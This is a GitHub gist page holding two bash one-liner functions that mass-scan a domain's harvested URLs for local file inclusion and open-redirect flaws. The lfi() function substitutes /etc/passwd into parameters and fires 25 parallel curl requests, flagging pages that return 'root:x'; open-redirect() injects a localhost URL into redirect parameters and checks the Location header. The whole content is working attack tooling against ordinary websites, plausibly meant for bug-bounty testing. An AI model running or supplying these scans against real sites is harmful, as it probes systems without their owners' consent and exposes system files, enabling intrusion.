Skip to content

Instantly share code, notes, and snippets.

@AlishahMughal123
Forked from dwisiswant0/bash_aliases.sh
Created September 20, 2020 12:18
Show Gist options
  • Save AlishahMughal123/63fc7b5b1bea168d2cff5588f6083cd5 to your computer and use it in GitHub Desktop.
Save AlishahMughal123/63fc7b5b1bea168d2cff5588f6083cd5 to your computer and use it in GitHub Desktop.
One-liner to get Open-redirect & LFI
lfi() {
gau $1 | gf lfi | qsreplace "/etc/passwd" | xargs -I % -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
}
open-redirect() {
local LHOST="http://localhost"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment